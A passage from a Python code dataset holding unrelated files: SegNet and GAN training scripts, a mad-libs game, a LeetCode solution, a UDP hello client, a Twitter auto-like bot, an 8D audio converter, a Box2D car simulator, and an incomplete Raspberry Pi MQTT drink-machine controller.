= []\n batch = 0\n\n\ndef 
setup_to_transfer_learning(model,base_model):\n for layer in base_model.layers:\n layer.trainable = False\n tf.trainable_variables()\n model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics= ['mae', 'acc'])\n\ndef setup_to_fine_tune(model,base_model):\n GAP_LAYER = 30\n for layer in base_model.layers[:GAP_LAYER+1]:\n layer.trainable = False\n for layer in base_model.layers[GAP_LAYER+1:]:\n layer.trainable = True\n model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics= ['mae', 'acc'])\n\n\ndef train():\n base_model = load_model('/home/zq/output/segnet_output/3rd_segnet_epoch_30_bs_2_new_image_100000/3rd_segnet_epoch_30_bs_2_new_image_100000.h5')\n model = base_model\n '''\n setup_to_transfer_learning(model, base_model)\n model.summary()\n train_set, val_set = get_train_val()\n train_numb = len(train_set)\n valid_numb = len(val_set)\n print(\"the number of train data is\", train_numb)\n print(\"the number of val data is\", valid_numb)\n\n H_tl = model.fit_generator(generator=generateData(BS, train_set), steps_per_epoch=train_numb // BS, epochs=EPOCHS_tl,\n verbose=1,\n validation_data=generateValidData(BS, val_set), validation_steps=valid_numb // BS,\n callbacks=[TensorBoard(log_dir=log_filepath_tl, histogram_freq=0, write_graph=True,\n write_grads=True, write_images=True)], max_q_size=1)\n\n # save as JSON\n json_string = model.to_json()\n open('/home/zq/output/segnet_output_tl_ft/my_model_architecture_tl.json', 'w').write(json_string)\n model = model_from_json(open('/home/zq/output/segnet_output_tl_ft/my_model_architecture_tl.json').read())\n\n model.save_weights('/home/zq/output/segnet_output_tl_ft/my_model_weights_tl.h5')\n\n model.save('/home/zq/output/segnet_output_tl_ft/segnet_tl.h5')\n\n # plot the training loss and accuracy\n plt.style.use(\"ggplot\")\n plt.figure()\n N = EPOCHS_tl\n plt.plot(np.arange(0, N), H_tl.history[\"loss\"], label=\"train_loss\")\n plt.plot(np.arange(0, N), H_tl.history[\"val_loss\"], label=\"val_loss\")\n plt.plot(np.arange(0, N), H_tl.history[\"acc\"], label=\"train_acc\")\n plt.plot(np.arange(0, N), H_tl.history[\"val_acc\"], label=\"val_acc\")\n plt.title(\"Training Loss and Accuracy on SegNet Satellite Seg\")\n plt.xlabel(\"Epoch_tl #\")\n plt.ylabel(\"Loss/Accuracy\")\n plt.legend(loc=\"lower left\")\n plt.savefig(\"/home/zq/output/segnet_output_tl_ft/segnet_loss_acc_tl.png\")\n '''\n\n setup_to_fine_tune(model, base_model)\n model.summary()\n train_set, val_set = get_train_val()\n train_numb = len(train_set)\n valid_numb = len(val_set)\n print(\"the number of train data is\", train_numb)\n print(\"the number of val data is\", valid_numb)\n\n H_ft = model.fit_generator(generator=generateData(BS, train_set), steps_per_epoch=train_numb // BS, epochs=EPOCHS_ft,\n verbose=1,\n validation_data=generateValidData(BS, val_set), validation_steps=valid_numb // BS,\n callbacks=[TensorBoard(log_dir=log_filepath_ft, histogram_freq=0, write_graph=True,\n write_grads=True, write_images=True)], max_q_size=1)\n\n # save as JSON\n json_string = model.to_json()\n open('/home/zq/output/segnet_output_tl_ft/my_model_architecture_ft.json', 'w').write(json_string)\n model = model_from_json(open('/home/zq/output/segnet_output_tl_ft/my_model_architecture_ft.json').read())\n\n model.save_weights('/home/zq/output/segnet_output_tl_ft/my_model_weights_ft.h5')\n\n model.save('/home/zq/output/segnet_output_tl_ft/segnet_ft.h5')\n\n # plot the training loss and accuracy\n plt.style.use(\"ggplot\")\n plt.figure()\n N = EPOCHS_ft\n plt.plot(np.arange(0, 
N), H_ft.history[\"loss\"], label=\"train_loss\")\n    plt.plot(np.arange(0, N), H_ft.history[\"val_loss\"], label=\"val_loss\")\n    plt.plot(np.arange(0, N), H_ft.history[\"acc\"], label=\"train_acc\")\n    plt.plot(np.arange(0, N), H_ft.history[\"val_acc\"], label=\"val_acc\")\n    plt.title(\"Training Loss and Accuracy on SegNet Satellite Seg\")\n    plt.xlabel(\"Epoch_ft #\")\n    plt.ylabel(\"Loss/Accuracy\")\n    plt.legend(loc=\"lower left\")\n    plt.savefig(\"/home/zq/output/segnet_output_tl_ft/segnet_loss_acc_ft.png\")\n\n\nif __name__ == '__main__':\n    train()\n","sub_path":"segnet_train_tl_ft_real.py","file_name":"segnet_train_tl_ft_real.py","file_ext":"py","file_size_in_byte":9061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"97648103","text":"#madlibs generator\n\npara = \"\"\" Once upon a time, there was PROPER NAME, a beautiful young ANIMAL. \nIt loved to play HOBBY. \nOne day, a (an) EVENT arose, bribing PROPER NAME to come check it out. \nThe OBJECT sounded very ADJECTIVE1 and ADJECTIVE2. Surprised,\nit was a treasure chest full of A DIFFERENT OBJECT. EMOTION, \nit picked it up and carried it back to the TRANSPORTATION. \nThen he climbed into the TRANSPORTATION NAME and drove PLACE. \nAnytime he opened the chest, he would put inside it a OBJECT for \nevery A DIFFERENT OBJECT he used up, glowing with EMOTION.\n\"\"\"\n\nprint(\"enter the following\")\nproper_name = input(\"proper name\\n\")\nhobby = input(\"enter hobby\\n\")\nevent = input(\"Event\\n\")\nobject1 = input(\"Object\\n\")\nadjective = input(\"adjective\\n\")\nadjective2 = input(\"adjective\\n\")\na_different_object = input(\"A different object\\n\")\nemotion = input(\"Emotion\\n\")\ntransportation = input(\"Transportation\\n\")\ntransportation_name = input(\"Transportation's name\\n\")\nplace = input(\"Place\\n\")\nobject2 = input(\"Object\\n\")\nemotion2 = input(\"Emotion\\n\")\nanimal = input(\"Animal\\n\")\n\n#replace longer placeholders first so \"OBJECT\" does not clobber \"A DIFFERENT OBJECT\",\n#and use a count of 1 where the same placeholder gets two different answers\npara = para.replace(\"PROPER NAME\",proper_name)\npara = para.replace(\"HOBBY\",hobby)\npara = para.replace(\"EVENT\",event)\npara = para.replace(\"A DIFFERENT OBJECT\",a_different_object)\npara = para.replace(\"OBJECT\",object1,1)\npara = para.replace(\"OBJECT\",object2)\npara = para.replace(\"ADJECTIVE1\",adjective)\npara = para.replace(\"ADJECTIVE2\",adjective2)\npara = para.replace(\"EMOTION\",emotion,1)\npara = para.replace(\"EMOTION\",emotion2)\npara = para.replace(\"TRANSPORTATION NAME\",transportation_name)\npara = para.replace(\"TRANSPORTATION\",transportation)\npara = para.replace(\"PLACE\",place)\npara = para.replace(\"ANIMAL\",animal)\nprint(para)\n","sub_path":"mad libs generator.py","file_name":"mad libs generator.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"508891635","text":"from dcgan import *\nfrom nonsaturating import *\nimport torch\nimport torch.optim as optim\nimport torchvision\nimport torchvision.transforms as transforms\nmnist = torchvision.datasets.MNIST('./MNIST',transform=transforms.Compose([transforms.Scale(32),transforms.ToTensor(),transforms.Normalize((.5,.5,.5),(.5,.5,.5))]),download=True)\ngenerator = Generator(64)\ndiscriminator = Discriminator(64)\ndevice = torch.device('cuda:0')\ngenerator.to(device)\ndiscriminator.to(device)\nprint(len(mnist))\nloader = torch.utils.data.DataLoader(mnist,batch_size=32,num_workers=4)\noptimG = optim.Adam(generator.parameters(),lr=0.0002)\noptimD = optim.SGD(discriminator.parameters(),lr=0.01)\ngan = NonsaturatingGAN(device,loader,generator,discriminator,optimG,optimD,batch_size=32,sample_size=32,epochs=100,label_smooth=0.7,p_flip=0.05,checkpoints='./nonsaturating-gan.model',recon='./images/')\ngan.set_targets(1)\ngan.load_model()\ngan.train()\n","sub_path":"CIFAR10/Nonsaturating-Heuristic/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"281096998","text":"# not hard\n\ndef letterCombinations(digits):\n    \"\"\"\n    :type digits: str\n    :rtype: List[str]\n    \"\"\"\n    if not digits:\n        return []\n    m = [[\"0\"], [\"1\"], [\"a\",\"b\",\"c\"], [\"d\",\"e\",\"f\"], [\"g\",\"h\",\"i\"], [\"j\",\"k\",\"l\"], [\"m\",\"n\",\"o\"], [\"p\",\"q\",\"r\",\"s\"],\n         [\"t\",\"u\",\"v\"], [\"w\",\"x\",\"y\",\"z\"]]\n    result = m[int(digits[0])]\n\n    for d in range(1, len(digits)):\n        new = []\n        for i in m[int(digits[d])]:\n            for x in result:\n                new.append(x + i)\n        result = new\n    return result\n\nprint(letterCombinations(\"\"))\n","sub_path":"1-100/mid/17. Letter Combinations of a Phone Number.py","file_name":"17. Letter Combinations of a Phone Number.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"57374126","text":"import socket\n\nUDP_IP = \"192.168.0.38\"\nUDP_PORT = 9001\nMESSAGE = \"Hello, World!\"\n\n\nsock = socket.socket(socket.AF_INET, # Internet\n                     socket.SOCK_DGRAM) # UDP\nsock.sendto(bytes(MESSAGE, 'ascii'), (UDP_IP, UDP_PORT))","sub_path":"udp_client.py","file_name":"udp_client.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"328147806","text":"import MyTwitter, sys\n\n# Text check\ndef check_text(text):\n    words = ['アニメーター', 'イラスト', '絵描き', 'pixiv']\n    return True in [word in text for word in words]\n\n# URL check\ndef check_url(entities, word):\n    try:\n        if word in entities['url']['urls'][0]['display_url']: return True\n    except:\n        pass\n    return True in [word in url['display_url'] for url in entities['description']['urls']]\n\ndef execute(list_name):\n    twitter, user_id = MyTwitter.login()\n    list_id = MyTwitter.get_list_id(list_name)\n    tweets = []\n    timeline = MyTwitter.get_list_timeline(twitter, list_id, 1000)\n    for tweet in timeline:\n        if tweet.get('retweeted_status'): tweet = tweet['retweeted_status']\n        user = tweet['user']\n        if tweet['entities'].get('media') \\\n        and MyTwitter.is_timeover(tweet['created_at'], 7) == False \\\n        and tweet['favorite_count'] > 1000 \\\n        and MyTwitter.is_liked(twitter, tweet['id_str']) == False \\\n        and user['followers_count'] > 2 * user['friends_count'] \\\n        and user['followers_count'] > 1000 \\\n        and tweet['favorite_count'] > 2 * tweet['retweet_count'] \\\n        and (check_text(user['description']) \\\n        or check_url(user['entities'], 'pixiv')):\n            tweets.append(tweet)\n    if tweets == []: return\n    tweet = max(tweets, key = lambda tweet: tweet['favorite_count'])\n    MyTwitter.like(twitter, tweet['id_str'])\n\nif __name__ == '__main__':\n    if len(sys.argv) == 2:\n        execute(sys.argv[1])\n    else:\n        print(\"Usage: python3 {0} [LIST_NAME]\".format(sys.argv[0]))\n        sys.exit()\n","sub_path":"LikeKawaii.py","file_name":"LikeKawaii.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"610164804","text":"from argparse import ArgumentParser\n\nimport numpy as np\nfrom mutagen.easyid3 
import EasyID3\nfrom mutagen.mp3 import MP3\nfrom pydub import AudioSegment\nfrom tqdm import tqdm\n\nreverberance = 50\nSECONDS = 3500\nMIN_FADE_VOL = -15.0\nFADE_TIME = 1000\n\n\ndef convert(inputfile, outputfile, period):\n if period < 0:\n period = period * (-1)\n elif period == 0:\n period = 200\n audio = AudioSegment.from_file(inputfile, format='mp3')\n audio = audio + AudioSegment.silent(duration=SECONDS)\n left = audio.pan(-1)\n right = audio.pan(1)\n faded_left = AudioSegment.silent(duration=0)\n faded_right = AudioSegment.silent(duration=0)\n fileinfo = MP3(inputfile, ID3=EasyID3)\n\n i = 0\n\n while len(faded_left) < len(audio):\n faded_left += left[i:i + SECONDS - FADE_TIME].fade(from_gain=MIN_FADE_VOL, start=0,\n duration=SECONDS - FADE_TIME)\n faded_left += left[i + SECONDS - FADE_TIME:i + SECONDS]\n i += SECONDS\n faded_left += left[i:i + SECONDS - FADE_TIME].fade(to_gain=MIN_FADE_VOL, start=0, duration=SECONDS - FADE_TIME)\n faded_left += left[i + SECONDS - FADE_TIME:i + SECONDS] + MIN_FADE_VOL\n i += SECONDS\n\n i = 0\n\n while len(faded_right) < len(audio):\n faded_right += right[i:i + SECONDS - FADE_TIME].fade(to_gain=MIN_FADE_VOL, start=0,\n duration=SECONDS - FADE_TIME)\n faded_right += right[i + SECONDS - FADE_TIME:i + SECONDS] + MIN_FADE_VOL\n i += SECONDS\n faded_right += right[i:i + SECONDS - FADE_TIME].fade(from_gain=MIN_FADE_VOL, start=0,\n duration=SECONDS - FADE_TIME)\n faded_right += right[i + SECONDS - FADE_TIME:i + SECONDS]\n i += SECONDS\n\n eightD = AudioSegment.empty()\n pan = 0.9 * np.sin(np.linspace(0, 2 * np.pi, period))\n chunks = list(enumerate(audio[::100]))\n\n for i, chunk in tqdm(chunks, desc='Converting', unit='chunks', total=len(chunks)):\n if len(chunk) < 100:\n continue\n newChunk = chunk.pan(pan[i % period])\n eightD = eightD + newChunk\n\n final = faded_right.overlay(faded_left)\n final = final[:len(audio[:-SECONDS])]\n\n final.export(outputfile, format='mp3')\n\n\n# def tags(info):\n# ret = dict()\n# ret['title'] = info['title'][0]\n# ret['album'] = info['album'][0]\n# ret['artist'] = info['artist'][0]\n# ret['genre'] = info['genre'][0]\n# return ret\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(description='Convert to 8D.')\n parser.add_argument('-i', type=str, required=True, help='input file')\n parser.add_argument('-o', type=str, default=parser.parse_args().i[:-4] + ' - 8D.mp3',\n help='output file (default: fileName - 8D.mp3)')\n parser.add_argument('-period', type=int, default=200, help='panning period (default: 200)')\n args = parser.parse_args()\n\n convert(args.i, args.o, args.period)\n","sub_path":"audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"324966702","text":"#odd nos\nl=[]\nn,q=map(int,input().split())\nfor i in range(n+1,q):\n if i%2==1:\n l.append(i)\nfor j in range(0,len(l)):\n if j==len(l)-1:\n print(l[j])\n else:\n print(l[j],end=\" \")\n","sub_path":"display_odd.py","file_name":"display_odd.py","file_ext":"py","file_size_in_byte":187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"583570668","text":"\"\"\" This file defines an environment for the Box2D PointMass simulator. 
\"\"\"\r\nimport numpy as np\r\nimport Box2D as b2\r\n\r\nfrom Box2D import (b2CircleShape, b2EdgeShape, b2FixtureDef, b2PolygonShape, b2_pi)\r\n# from Box2D import *\r\nfrom framework import Framework\r\n# from math import sqrt, cos, sin\r\nimport math\r\nfrom gps.agent.box2d.settings import fwSettings\r\nfrom gps.proto.gps_pb2 import END_EFFECTOR_POINTS, END_EFFECTOR_POINT_VELOCITIES\r\n\r\n\r\nclass TDGroundArea(object):\r\n \"\"\"\r\n An area on the ground that the car can run over\r\n \"\"\"\r\n\r\n def __init__(self, friction_modifier):\r\n self.friction_modifier = friction_modifier\r\n\r\n\r\nclass TDTire(object):\r\n\r\n def __init__(self, car, max_forward_speed=100.0,\r\n max_backward_speed=-20, max_drive_force=150,\r\n turn_torque=15, max_lateral_impulse=3,\r\n dimensions=(0.25, 0.6), density=1.0,\r\n position=(0, 0)):\r\n\r\n world = car.body.world\r\n\r\n self.current_traction = 1\r\n self.turn_torque = turn_torque\r\n self.max_forward_speed = max_forward_speed\r\n self.max_backward_speed = max_backward_speed\r\n self.max_drive_force = max_drive_force\r\n self.max_lateral_impulse = max_lateral_impulse\r\n self.ground_areas = []\r\n\r\n self.body = world.CreateDynamicBody(position=position)\r\n self.body.CreatePolygonFixture(box=dimensions, density=density)\r\n self.body.userData = {'obj': self}\r\n\r\n @property\r\n def forward_velocity(self):\r\n body = self.body\r\n current_normal = body.GetWorldVector((0, 1))\r\n return current_normal.dot(body.linearVelocity) * current_normal\r\n\r\n @property\r\n def lateral_velocity(self):\r\n body = self.body\r\n\r\n right_normal = body.GetWorldVector((1, 0))\r\n return right_normal.dot(body.linearVelocity) * right_normal\r\n\r\n def update_friction(self):\r\n impulse = -self.lateral_velocity * self.body.mass\r\n if impulse.length > self.max_lateral_impulse:\r\n impulse *= self.max_lateral_impulse / impulse.length\r\n\r\n self.body.ApplyLinearImpulse(self.current_traction * impulse,\r\n self.body.worldCenter, True)\r\n\r\n aimp = 0.1 * self.current_traction * \\\r\n self.body.inertia * -self.body.angularVelocity\r\n self.body.ApplyAngularImpulse(aimp, True)\r\n\r\n current_forward_normal = self.forward_velocity\r\n current_forward_speed = current_forward_normal.Normalize()\r\n\r\n drag_force_magnitude = -2 * current_forward_speed\r\n self.body.ApplyForce(self.current_traction * drag_force_magnitude * current_forward_normal,\r\n self.body.worldCenter, True)\r\n\r\n def update_drive(self, speed):\r\n # if 'up' in keys:\r\n # desired_speed = self.max_forward_speed\r\n # elif 'down' in keys:\r\n # desired_speed = self.max_backward_speed\r\n # else:\r\n # return\r\n\r\n desired_speed = speed\r\n\r\n # find the current speed in the forward direction\r\n current_forward_normal = self.body.GetWorldVector((0, 1))\r\n current_speed = self.forward_velocity.dot(current_forward_normal)\r\n\r\n # apply necessary force\r\n force = 0.0\r\n if desired_speed > current_speed:\r\n force = self.max_drive_force\r\n elif desired_speed < current_speed:\r\n force = -self.max_drive_force\r\n else:\r\n return\r\n\r\n self.body.ApplyForce(self.current_traction * force * current_forward_normal,\r\n self.body.worldCenter, True)\r\n\r\n def update_turn(self, keys):\r\n if 'left' in keys:\r\n desired_torque = self.turn_torque\r\n elif 'right' in keys:\r\n desired_torque = -self.turn_torque\r\n else:\r\n return\r\n\r\n self.body.ApplyTorque(desired_torque, True)\r\n\r\n def add_ground_area(self, ud):\r\n if ud not in self.ground_areas:\r\n 
self.ground_areas.append(ud)\r\n self.update_traction()\r\n\r\n def remove_ground_area(self, ud):\r\n if ud in self.ground_areas:\r\n self.ground_areas.remove(ud)\r\n self.update_traction()\r\n\r\n def update_traction(self):\r\n if not self.ground_areas:\r\n self.current_traction = 1\r\n else:\r\n self.current_traction = 0\r\n mods = [ga.friction_modifier for ga in self.ground_areas]\r\n\r\n max_mod = max(mods)\r\n if max_mod > self.current_traction:\r\n self.current_traction = max_mod\r\n\r\n\r\nclass TDCar(object):\r\n vertices = [(0.75, 0.0),\r\n (1.5, 1.25),\r\n (1.4, 2.75),\r\n (0.5, 5.0),\r\n (-0.5, 5.0),\r\n (-1.4, 2.75),\r\n (-1.5, 1.25),\r\n (-0.75, 0.0),\r\n ]\r\n\r\n tire_anchors = [(-1.5, 0.37),\r\n (1.5, 0.37),\r\n (-1.5, 4.25),\r\n (1.5, 4.25),\r\n ]\r\n\r\n def __init__(self, world, vertices=None,\r\n tire_anchors=None, density=0.1, position=(0, 0), angle=0,\r\n **tire_kws):\r\n if vertices is None:\r\n vertices = TDCar.vertices\r\n\r\n self.world = world\r\n self.body = world.CreateDynamicBody(position=position)\r\n self.body.CreatePolygonFixture(vertices=vertices, density=density)\r\n self.body.userData = {'obj': self}\r\n self.body.angle = angle\r\n\r\n # self.position = position\r\n # self.linearVelocity = self.body.linearVelocity\r\n\r\n self.tires = [TDTire(self, **tire_kws) for i in range(4)]\r\n\r\n if tire_anchors is None:\r\n anchors = TDCar.tire_anchors\r\n\r\n joints = self.joints = []\r\n for tire, anchor in zip(self.tires, anchors):\r\n j = world.CreateRevoluteJoint(bodyA=self.body,\r\n bodyB=tire.body,\r\n localAnchorA=anchor,\r\n # center of tire\r\n localAnchorB=(0, 0),\r\n enableMotor=False,\r\n maxMotorTorque=1000,\r\n enableLimit=True,\r\n lowerAngle=0,\r\n upperAngle=0,\r\n )\r\n\r\n tire.body.position = self.body.worldCenter + anchor\r\n joints.append(j)\r\n\r\n def update(self, angle, speed, hz):\r\n for tire in self.tires:\r\n tire.update_friction()\r\n\r\n for tire in self.tires:\r\n tire.update_drive(speed)\r\n\r\n # control steering\r\n lock_angle = math.radians(40.)\r\n # from lock to lock in 0.5 sec\r\n turn_speed_per_sec = math.radians(160.)\r\n turn_per_timestep = turn_speed_per_sec / hz\r\n desired_angle = 0.0\r\n\r\n if angle > lock_angle:\r\n angle = lock_angle\r\n\r\n if angle < -lock_angle:\r\n angle = -lock_angle\r\n\r\n desired_angle = angle\r\n\r\n front_left_joint, front_right_joint = self.joints[2:4]\r\n angle_now = front_left_joint.angle\r\n angle_to_turn = desired_angle - angle_now\r\n\r\n # TODO fix b2Clamp for non-b2Vec2 types\r\n if angle_to_turn < -turn_per_timestep:\r\n angle_to_turn = -turn_per_timestep\r\n elif angle_to_turn > turn_per_timestep:\r\n angle_to_turn = turn_per_timestep\r\n\r\n new_angle = angle_now + angle_to_turn\r\n # Rotate the tires by locking the limits:\r\n front_left_joint.SetLimits(new_angle, new_angle)\r\n front_right_joint.SetLimits(new_angle, new_angle)\r\n\r\n def destroy(self):\r\n for tire in self.tires:\r\n self.world.DestroyBody(tire.body)\r\n tire = None\r\n\r\n self.world.DestroyBody(self.body)\r\n\r\nclass CarWorld(Framework):\r\n name = \"Car\"\r\n\r\n def __init__(self, x0, target, render):\r\n self.render = render\r\n if self.render:\r\n super(CarWorld, self).__init__()\r\n else:\r\n self.world = b2.b2World(gravity=(0, 0), doSleep=True)\r\n\r\n self.world.gravity = (0.0, 0.0)\r\n self.initial_position = (x0[0], x0[1])\r\n self.initial_angle = 0\r\n\r\n ground = self.world.CreateBody(position=(0, 20))\r\n ground.CreateEdgeChain(\r\n [(-10, -30),\r\n (-10, 5),\r\n (-30, 30),]\r\n )\r\n\t \r\n 
ground.CreateEdgeChain(\r\n [(10, -30),\r\n (10, 5),\r\n (-10, 30),]\r\n )\r\n\t \r\n xf1 = b2.b2Transform()\r\n xf1.angle = 0.3524 * b2.b2_pi\r\n xf1.position = b2.b2Mul(xf1.R, (1.0, 0.0))\r\n\r\n xf2 = b2.b2Transform()\r\n xf2.angle = -0.3524 * b2.b2_pi\r\n xf2.position = b2.b2Mul(xf2.R, (-1.0, 0.0))\r\n\r\n self.car = TDCar(self.world, position=self.initial_position, angle=self.initial_angle)\r\n\r\n self.target = self.world.CreateStaticBody(\r\n position=target[:2],\r\n angle=self.initial_angle,\r\n shapes=[b2.b2PolygonShape(vertices=[xf1*(-1, 0), xf1*(1, 0),\r\n xf1*(0, .5)]),\r\n b2.b2PolygonShape(vertices=[xf2*(-1, 0), xf2*(1, 0),\r\n xf2*(0, .5)])],\r\n )\r\n self.target.active = False\r\n\r\n\r\n self.start = self.world.CreateStaticBody(\r\n position=self.initial_position,\r\n angle=self.initial_angle,\r\n shapes=[b2.b2PolygonShape(vertices=[xf1*(-1, 0), xf1*(1, 0),\r\n xf1*(0, .5)]),\r\n b2.b2PolygonShape(vertices=[xf2*(-1, 0), xf2*(1, 0),\r\n xf2*(0, .5)])],\r\n )\r\n self.start.active = False\r\n\r\n def run(self):\r\n \"\"\"Initiates the first time step\r\n \"\"\"\r\n if self.render:\r\n super(CarWorld, self).run()\r\n else:\r\n self.run_next(None)\r\n\r\n def run_next(self, action):\r\n \"\"\"Moves forward in time one step. Calls the renderer if applicable.\"\"\"\r\n if self.render:\r\n super(CarWorld, self).run_next(action)\r\n else:\r\n if action is not None:\r\n self.car.update(action[1], action[0], fwSettings.hz)\r\n self.world.Step(1.0 / fwSettings.hz, fwSettings.velocityIterations,\r\n fwSettings.positionIterations)\r\n\r\n def Step(self, settings, action):\r\n \"\"\"Called upon every step. \"\"\"\r\n self.car.update(action[1], action[0], 60)\r\n # self.car.body.linearVelocity = (action[0], action[1])\r\n # print self.car.position\r\n super(CarWorld, self).Step(settings)\r\n\r\n def reset_world(self):\r\n \"\"\" This resets the world to its initial state\"\"\"\r\n self.world.ClearForces()\r\n self.car.body.position = self.initial_position\r\n self.car.body.angle = self.initial_angle\r\n\r\n # self.car.update(0, 0, 60)\r\n\r\n # print self.car.body.position\r\n\r\n self.car.destroy()\r\n self.car = TDCar(self.world, position=self.initial_position, angle=self.initial_angle)\r\n\r\n # self.car.body.angularVelocity = self.initial_angular_velocity\r\n # self.car.body.linearVelocity = self.initial_linear_velocity\r\n\r\n def get_state(self):\r\n \"\"\" This retrieves the state of the point mass\"\"\"\r\n state = {END_EFFECTOR_POINTS: np.append(np.array(self.car.body.position), [0]),\r\n END_EFFECTOR_POINT_VELOCITIES: np.append(np.array(self.car.body.linearVelocity), [0])}\r\n\r\n return state\r\n","sub_path":"python/gps/agent/box2d/car_world.py","file_name":"car_world.py","file_ext":"py","file_size_in_byte":11777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"95697946","text":"\"\"\"\r\n---------------------------- MIMOSA machine ----------------------------\r\nRun the machine through Raspberry GPIO ports and control it with Ikea Trådfri remote controller via MQTT server \r\n\"\"\"\r\n\r\nimport paho.mqtt.client as mqtt\r\nimport os\r\nimport time\r\nimport json\r\nimport RPi.GPIO as GPIO\r\n\r\nConnected = False #global variable for the state of the connection\r\nRATIO = 5 # global variable for alcohol ratio (scale 0 - 10)\r\n\r\nbroker_address = \"localhost\"\r\nport = 1883\r\nuser = \"pi\"\r\n#password = \"raspberry\"\r\n\r\nGPIO.setmode(GPIO.BCM)\r\n\r\n# pins dict\r\npins = {\r\n #23: {\"name\": \"GPIO 23\", 
\"state\": GPIO.LOW},\r\n \"air_pump\": {\"pin\": 21, \"name\": \"GPIO 29\", \"default_state\": GPIO.LOW},\r\n \"alc\": {\"pin\": 20, \"name\": \"GPIO 28\", \"default_state\": GPIO.LOW},\r\n \"mixer\": {\"pin\": 16, \"name\": \"GPIO 27\", \"default_state\": GPIO.LOW},\r\n}\r\n\r\ndef reset_pins():\r\n \"\"\"Reset pins\"\"\"\r\n print(\"resetting pins\")\r\n for pin_name, pin_info in pins.items():\r\n pin = pin_info[\"pin\"]\r\n GPIO.setup(pin, GPIO.OUT)\r\n GPIO.output(pin, pin_info[\"default_state\"])\r\n\r\n# The callback for when the client receives a CONNACK response from the server.\r\ndef on_connect(self, userdata, flags, rc):\r\n if rc == 0:\r\n print(\"Connected to broker\")\r\n global Connected #Use global variable\r\n Connected = True #Signal connection \r\n else:\r\n print(\"Connection failed\")\r\n\r\n# The callback for when a PUBLISH message is received from the server.\r\ndef listener(self, userdata, msg):\r\n try:\r\n message = json.loads(msg.payload)\r\n # Make_drink\r\n if(message['action'] == \"toggle\"):\r\n make_drink(self)\r\n print(\"pushing toggle (make a drink)\")\r\n # Decrease alc_level\r\n elif(message['action'] == \"brightness_down_click\"):\r\n alc_ratio(self, 0)\r\n print(\"pushing brightness_down_click (alc_ratio decrease)\")\r\n # Increase alc_level\r\n elif(message['action'] == \"brightness_up_click\"):\r\n alc_ratio(self, 1)\r\n print(\"pushing brightness_up_click (alc_ratio increase)\")\r\n # Reset alc_level\r\n elif(message['action'] == \"arrow_left_click\" or message['action'] == \"arrow_right_click\"):\r\n alc_ratio(self, 2)\r\n print(\"pushing arrow_left_click (reset)\")\r\n else:\r\n print(\"unknown button signal\")\r\n except Exception as e:\r\n print(\"Exception: \" + e)\r\n\r\ndef make_drink(self):\r\n \"\"\"Make a drink\"\"\"\r\n # pump on = red led on\r\n reset_pins()\r\n\r\n print(\"The pump is ON\")\r\n GPIO.output(pins[\"air_pump\"][\"pin\"], GPIO.HIGH)\r\n time.sleep(1)\r\n # alcohol = yellow led on\r\n GPIO.output(pins[\"alc\"][\"pin\"], GPIO.HIGH)\r\n print(\"Alcohol valve is open\")\r\n time.sleep(RATIO)\r\n GPIO.output(pins[\"alc\"][\"pin\"], GPIO.LOW)\r\n print(\"Alcohol valve is closed\")\r\n \r\n # mixer = green led on\r\n GPIO.output(pins[\"mixer\"][\"pin\"], GPIO.HIGH)\r\n print(\"Mixer valve is open\")\r\n # fix this hardcoded 10\r\n time.sleep(10 - RATIO)\r\n GPIO.output(pins[\"mixer\"][\"pin\"], GPIO.LOW)\r\n print(\"Mixer valve is closed\")\r\n\r\n #pump off\r\n GPIO.output(pins[\"air_pump\"][\"pin\"], GPIO.LOW)\r\n print(\"Pump off\")\r\n sender(self, 1) # drink done\r\n\r\n# Create and publish message to the server\r\ndef sender(self, action, brightness=254):\r\n if action == 1: # Drink done, flash the lamp\r\n self.publish(\"zigbee2mqtt/IKEA_LAMP/set\", create_payload(\"TOGGLE\"))\r\n time.sleep(2)\r\n self.publish(\"zigbee2mqtt/IKEA_LAMP/set\", create_payload(\"TOGGLE\"))\r\n elif action == 2: # Adjust the brightness of the lamp\r\n self.publish(\"zigbee2mqtt/IKEA_LAMP/set\", create_payload(\"ON\", brightness))\r\n else:\r\n print(\"Cannot publish message, unkown action\")\r\n \r\ndef create_payload(lamp_state, brightness_value=254):\r\n # Lamp_state \"TOGGLE\" runs only without brightness value)\r\n if lamp_state == \"TOGGLE\":\r\n payload = '{\"state\":\"TOGGLE\"}'\r\n else:\r\n payload = '{\"state\":\"' + str(lamp_state) + '\", \"brightness\":\"' + str(brightness_value) + '\"}'\r\n return payload\r\n\r\ndef alc_ratio(self, ratio_action):\r\n \"\"\"Set alcohol ratio\"\"\"\r\n global RATIO\r\n #brightness ratio * 25 needs 
